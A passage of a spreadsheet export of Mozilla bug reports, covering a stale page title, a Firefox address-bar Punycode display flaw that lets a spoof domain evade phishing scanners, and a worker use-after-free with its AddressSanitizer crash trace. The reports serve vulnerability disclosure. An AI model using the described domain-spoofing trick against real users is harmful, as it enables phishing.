          <t>2011-05-05 14:44:49 -0700</t>
        </is>
      </c>
      <c r="C4054" t="inlineStr">
        <is>
          <t>Title on Webify Me pages has old project name</t>
        </is>
      </c>
      <c r="D4054" t="inlineStr">
        <is>
          <t>2011-05-13 09:58:36 -0700</t>
        </is>
      </c>
      <c r="E4054" t="n">
        <v>1</v>
      </c>
      <c r="F4054" t="n">
        <v>1</v>
      </c>
      <c r="G4054" t="n">
        <v>5</v>
      </c>
      <c r="H4054" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4054" t="inlineStr">
        <is>
          <t>Websites</t>
        </is>
      </c>
      <c r="J4054" t="inlineStr">
        <is>
          <t>webifyme.org</t>
        </is>
      </c>
      <c r="K4054" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4054" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4054" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4054" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4054" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4054" t="inlineStr"/>
      <c r="Q4054" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4054" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4054" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T4054" t="n">
        <v>1</v>
      </c>
      <c r="U4054" t="n">
        <v>0</v>
      </c>
      <c r="V4054" t="n">
        <v>3</v>
      </c>
      <c r="W4054" t="inlineStr">
        <is>
          <t>The &lt;title&gt; element on the site has the old name for the project, Firefox 4 Internet Things. It should be updated to the new name.
Current title: Firefox 4 Internet Things
Title should be: Webify Me
This bug blocks the string freeze.</t>
        </is>
      </c>
      <c r="X4054" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4055">
      <c r="A4055" t="n">
        <v>1399540</v>
      </c>
      <c r="B4055" t="inlineStr">
        <is>
          <t>2017-09-13 09:38:03 -0700</t>
        </is>
      </c>
      <c r="C4055" t="inlineStr">
        <is>
          <t>Mozilla Firefox IDN display vulnerability</t>
        </is>
      </c>
      <c r="D4055" t="inlineStr">
        <is>
          <t>2018-11-05 14:01:33 -0800</t>
        </is>
      </c>
      <c r="E4055" t="n">
        <v>1</v>
      </c>
      <c r="F4055" t="n">
        <v>1</v>
      </c>
      <c r="G4055" t="n">
        <v>2</v>
      </c>
      <c r="H4055" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4055" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4055" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K4055" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L4055" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4055" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4055" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4055" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4055" t="inlineStr">
        <is>
          <t>[adv-main57+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4055" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4055" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4055" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T4055" t="n">
        <v>1</v>
      </c>
      <c r="U4055" t="n">
        <v>0</v>
      </c>
      <c r="V4055" t="n">
        <v>21</v>
      </c>
      <c r="W4055" t="inlineStr">
        <is>
          <t>Created attachment 8907679
poc.html
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Build ID: 20170824053838
Steps to reproduce:
1. Created the attached PoC HTML page, which contains a hyperlink to a fake A-label subdomain (xn--accountlogin) of a valid IDN (xn--google.com).
2. Opened the attached PoC HTML page in the latest released version of Firefox (55.0.3)
3. Hovered over the hyperlink
4. Observed the display of the hyperlink URL
Actual results:
The displayed URL was "xn--accountlogin.xn--google.com".
Expected results:
The displayed URL should be "xn--accountlogin.䕮䕵䕶䕱.com".
An issue that makes this slightly more serious is that some URL scanning and phishing services will fail to detect the URL, since they assume the browser will display “xn--google.com” in its UNICODE format, and not its Punycode format, and that the URL is therefore not deceptive.  They do this to avoid false positives for Punycode domains that happen by chance to have a deceptive substring, but are not themselves deceptive.  The ability to force Firefox to display bare Punycode makes such URLs dangerous again.
The attached Proof of Concept demonstrates that an attacker could register a Punycode spoof domain (such as xn--google.com) and then specify a Fake A-label subdomain so that the Punycode spoof domain name is displayed in its Punycode representation. In this proof of concept, we demonstrate that a Fake A-label subdomain of "xn--accountlogin" incorrectly causes the parent label "xn--google" to be rendered as Punycode. We expect the correct behavior to be that the rendering of parent name labels to be independent of child label values. In other words, we believe the correct rendering of this domain name to be "xn--accountlogin.䕮䕵䕶䕱.com", not "xn--accountlogin.xn--google.com". It should be noted that the latest released version of Chrome and Safari consistently display this domain name as "䕮䕵䕶䕱.com" regardless of child label values.</t>
        </is>
      </c>
      <c r="X4055" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4056">
      <c r="A4056" t="n">
        <v>1169867</v>
      </c>
      <c r="B4056" t="inlineStr">
        <is>
          <t>2015-05-29 16:27:29 -0700</t>
        </is>
      </c>
      <c r="C4056" t="inlineStr">
        <is>
          <t>Use After Free in CanonicalizeXPCOMParticipant() with dedicated worker</t>
        </is>
      </c>
      <c r="D4056" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:45 -0700</t>
        </is>
      </c>
      <c r="E4056" t="n">
        <v>1</v>
      </c>
      <c r="F4056" t="n">
        <v>1</v>
      </c>
      <c r="G4056" t="n">
        <v>3</v>
      </c>
      <c r="H4056" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4056" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4056" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K4056" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L4056" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4056" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4056" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4056" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4056" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+][adv-esr31.8+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q4056" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4056" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4056" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T4056" t="n">
        <v>1</v>
      </c>
      <c r="U4056" t="n">
        <v>0</v>
      </c>
      <c r="V4056" t="n">
        <v>35</v>
      </c>
      <c r="W4056" t="inlineStr">
        <is>
          <t>Created attachment 8613166
Uaf_CanonicalizeXPCOMParticipant_DedicatedWorker_repro.js
Using XMLHttpRequest in dedicated workers can trigger a Use After Free. It's kind of a variant of Bug 1166924 (a similar use after free in shared worker), however,this bug was found after Bug 1166924  was fixed.
Firefox version: 41.0a1 (2015-05-29)
Steps to reproduce:
1. Run server side script Uaf_CanonicalizeXPCOMParticipant_DedicatedWorker_repro.js in Node.js (node Uaf_CanonicalizeXPCOMParticipant_DedicatedWorker_repro.js).
2. Enter http://localhost:12345 in Firefox browser.
3. If it crashes in other places, just restore the tab.
Result in Asan build:
=================================================================
==8659==ERROR: AddressSanitizer: heap-use-after-free on address 0x61100026b3c0 at pc 0x7ff5728da512 bp 0x7ff55298a7d0 sp 0x7ff55298a7c8
READ of size 8 at 0x61100026b3c0 thread T22 (DOM Worker)
    #0 0x7ff5728da511 in CanonicalizeXPCOMParticipant /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:930
    #1 0x7ff5728da511 in CCGraphBuilder::NoteXPCOMChild(nsISupports*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:2332
    #2 0x7ff5728cd446 in mozilla::CycleCollectedJSRuntime::TraverseGCThing(mozilla::CycleCollectedJSRuntime::TraverseSelect, JS::GCCellPtr, nsCycleCollectionTraversalCallback&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:664
    #3 0x7ff5728ccfe8 in mozilla::JSGCThingParticipant::Traverse(void*, nsCycleCollectionTraversalCallback&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:353
    #4 0x7ff5728d8ba4 in CCGraphBuilder::BuildGraph(js::SliceBudget&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:2239
    #5 0x7ff5728dddf7 in nsCycleCollector::MarkRoots(js::SliceBudget&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:2839
    #6 0x7ff5728e2ca7 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:3603
    #7 0x7ff5728e629a in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:4098
    #8 0x7ff5728d0bac in mozilla::CycleCollectedJSRuntime::OnGC(JSGCStatus) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:1266
    #9 0x7ff57be5916c in js::gc::GCRuntime::collect(bool, js::SliceBudget, JS::gcreason::Reason) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsgc.cpp:6178
    #10 0x7ff57be59b09 in js::gc::GCRuntime::gc(JSGCInvocationKind, JS::gcreason::Reason) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsgc.cpp:6234
    #11 0x7ff57bd54531 in js::DestroyContext(JSContext*, js::DestroyContextMode) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxt.cpp:185
    #12 0x7ff57791eea8 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/RuntimeService.cpp:2823
    #13 0x7ff5729df784 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:846
    #14 0x7ff572a585ba in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #15 0x7ff57329a378 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:355
    #16 0x7ff573226a0c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #17 0x7ff573226a0c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #18 0x7ff573226a0c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #19 0x7ff5729dc2c8 in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:359
    #20 0x7ff57f4b0135 in _pt_root /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:212
    #21 0x7ff57faf0181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
    #22 0x7ff57058b30c (/lib/x86_64-linux-gnu/libc.so.6+0xfb30c)
0x61100026b3c0 is located 0 bytes inside of 232-byte region [0x61100026b3c0,0x61100026b4a8)
freed by thread T22 (DOM Worker) here:
    #0 0x474a01 in free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64
    #1 0x7ff5728dd99d in SnowWhiteKiller::~SnowWhiteKiller() /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:2639
    #2 0x7ff5728dd5ce in nsCycleCollector::FreeSnowWhite(bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:2807
    #3 0x7ff5728e367e in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:3774
    #4 0x7ff5728e2c95 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:3599
    #5 0x7ff5728e629a in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:4098
    #6 0x7ff5728d0bac in mozilla::CycleCollectedJSRuntime::OnGC(JSGCStatus) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:1266
    #7 0x7ff57be5916c in js::gc::GCRuntime::collect(bool, js::SliceBudget, JS::gcreason::Reason) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsgc.cpp:6178
    #8 0x7ff57be59b09 in js::gc::GCRuntime::gc(JSGCInvocationKind, JS::gcreason::Reason) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsgc.cpp:6234
    #9 0x7ff57bd54531 in js::DestroyContext(JSContext*, js::DestroyContextMode) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxt.cpp:185
    #10 0x7ff57791eea8 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/RuntimeService.cpp:2823
    #11 0x7ff5729df784 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:846
    #12 0x7ff572a585ba in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #13 0x7ff57329a378 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:355
    #14 0x7ff573226a0c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #15 0x7ff573226a0c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #16 0x7ff573226a0c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #17 0x7ff5729dc2c8 in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:359
    #18 0x7ff57f4b0135 in _pt_root /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:212
    #19 0x7ff57faf0181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
previously allocated by thread T22 (DOM Worker) here:
    #0 0x474c01 in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x4921cd in moz_xmalloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/memory/mozalloc/mozalloc.cpp:83
    #2 0x7ff5779aab85 in operator new /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/workers/../../dist/include/mozilla/mozalloc.h:186
    #3 0x7ff5779aab85 in mozilla::dom::workers::XMLHttpRequest::Constructor(mozilla::dom::GlobalObject const&amp;, mozilla::dom::MozXMLHttpRequestParameters const&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/XMLHttpRequest.cpp:1655
    #4 0x7ff575e21b70 in mozilla::dom::XMLHttpRequestBinding_workers::_constructor(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./XMLHttpRequestBinding.cpp:3175
    #5 0x7ff57b2dcb4e in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:235
    #6 0x7ff57b2dcb4e in CallJSNativeConstructor /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:268
    #7 0x7ff57b2dcb4e in js::InvokeConstructor(JSContext*, JS::CallArgs) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:822
    #8 0x7ff57b2b935f in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2953
    #9 0x7ff57b28ca69 in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:677
    #10 0x7ff57b2de0dd in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:903
    #11 0x7ff57b2de724 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:942
    #12 0x7ff57bd755fa in Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4257
    #13 0x7ff577916121 in (anonymous namespace)::ScriptExecutorRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1638
    #14 0x7ff57799b3a4 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:357
    #15 0x7ff5729df784 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:846
    #16 0x7ff572a585ba in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #17 0x7ff577984817 in mozilla::dom::workers::WorkerPrivate::RunCurrentSyncLoop() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:6022
    #18 0x7ff5778ff324 in Run /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.h:1461
    #19 0x7ff5778ff324 in (anonymous namespace)::LoadAllScripts(JSContext*, mozilla::dom::workers::WorkerPrivate*, nsTArray&lt;(anonymous namespace)::ScriptLoadInfo&gt;&amp;, bool, mozilla::dom::workers::WorkerScriptType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1719
    #20 0x7ff5778fed35 in mozilla::dom::workers::scriptloader::LoadMainScript(JSContext*, nsAString_internal const&amp;, mozilla::dom::workers::WorkerScriptType) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/ScriptLoader.cpp:1814
    #21 0x7ff5779db5e1 in (anonymous namespace)::CompileScriptRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:1057
    #22 0x7ff57799b3a4 in mozilla::dom::workers::WorkerRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerRunnable.cpp:357
    #23 0x7ff5729df784 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:846
    #24 0x7ff572a585ba in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #25 0x7ff57797b363 in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:5200
    #26 0x7ff57791edf2 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/RuntimeService.cpp:2803
    #27 0x7ff5729df784 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:846
    #28 0x7ff572a585ba in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
    #29 0x7ff57329a378 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessagePump.cpp:355
    #30 0x7ff573226a0c in RunInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:233
    #31 0x7ff573226a0c in RunHandler /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:226
    #32 0x7ff573226a0c in MessageLoop::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:200
    #33 0x7ff5729dc2c8 in nsThread::ThreadFunc(void*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:359
    #34 0x7ff57f4b0135 in _pt_root /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:212
    #35 0x7ff57faf0181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
Thread T22 (DOM Worker) created by T0 (Web Content) here:
    #0 0x461475 in pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:175
    #1 0x7ff57f4acabd in _PR_CreateThread /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:453
    #2 0x7ff57f4ac63a in PR_CreateThread /builds/slave/m-cen-l64-asan-000000000000000/build/src/nsprpub/pr/src/pthreads/ptthread.c:544
    #3 0x7ff5729dd74b in nsThread::Init() /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:469
    #4 0x7ff5779a54aa in mozilla::dom::workers::WorkerThread::Create(mozilla::dom::workers::WorkerThreadFriendKey const&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerThread.cpp:90
    #5 0x7ff5778f30e6 in mozilla::dom::workers::RuntimeService::ScheduleWorker(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/RuntimeService.cpp:1751
    #6 0x7ff5778f0844 in mozilla::dom::workers::RuntimeService::RegisterWorker(JSContext*, mozilla::dom::workers::WorkerPrivate*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/RuntimeService.cpp:1605
    #7 0x7ff577979d2d in mozilla::dom::workers::WorkerPrivate::Constructor(JSContext*, nsAString_internal const&amp;, bool, mozilla::dom::WorkerType, nsACString_internal const&amp;, mozilla::dom::workers::WorkerLoadInfo*, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:4774
    #8 0x7ff577979536 in Constructor /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:4709
    #9 0x7ff577979536 in mozilla::dom::workers::WorkerPrivate::Constructor(mozilla::dom::GlobalObject const&amp;, nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/workers/WorkerPrivate.cpp:4650
    #10 0x7ff575e55586 in mozilla::dom::WorkerBinding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./WorkerBinding.cpp:747
    #11 0x7ff57b2dcb4e in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:235
    #12 0x7ff57b2dcb4e in CallJSNativeConstructor /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:268
    #13 0x7ff57b2dcb4e in js::InvokeConstructor(JSContext*, JS::CallArgs) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:822
    #14 0x7ff57b2b935f in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2953
    #15 0x7ff57b28ca69 in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:677
    #16 0x7ff57b2de0dd in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:903
    #17 0x7ff57b2de724 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:942
    #18 0x7ff57bd755fa in Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4257
    #19 0x7ff57bd75d5f in Evaluate /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4284
    #20 0x7ff57bd75d5f in JS::Evaluate(JSContext*, JS::AutoVectorRooter&lt;JSObject*&gt;&amp;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4339
    #21 0x7ff574d5816a in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, nsJSUtils::EvaluateOptions const&amp;, JS::MutableHandle&lt;JS::Value&gt;, void**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsJSUtils.cpp:265
    #22 0x7ff574d5909b in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, void**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsJSUtils.cpp:337
    #23 0x7ff574ddc312 in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*, JS::SourceBufferHolder&amp;, void**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsScriptLoader.cpp:1146
    #24 0x7ff574dd9a31 in nsScriptLoader::ProcessRequest(nsScriptLoadRequest*, void**) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsScriptLoader.cpp:975
    #25 0x7ff574dd3177 in nsScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsScriptLoader.cpp:764
    #26 0x7ff574dce7de in nsScriptElement::MaybeProcessScript() /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsScriptElement.cpp:141
    #27 0x7ff5742079c4 in operator-&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/base/nsIScriptElement.h:221
    #28 0x7ff5742079c4 in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:662
    #29 0x7ff574205eb1 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:487
    #30 0x7ff57420c8eb in nsHtml5ExecutorFlusher::Run() /builds/slave/m-cen-l64-asan-000000000000000/build/src/parser/html/nsHtml5StreamParser.cpp:127
    #31 0x7ff5729df784 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/threads/nsThread.cpp:846
    #32 0x7ff572a585ba in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:265
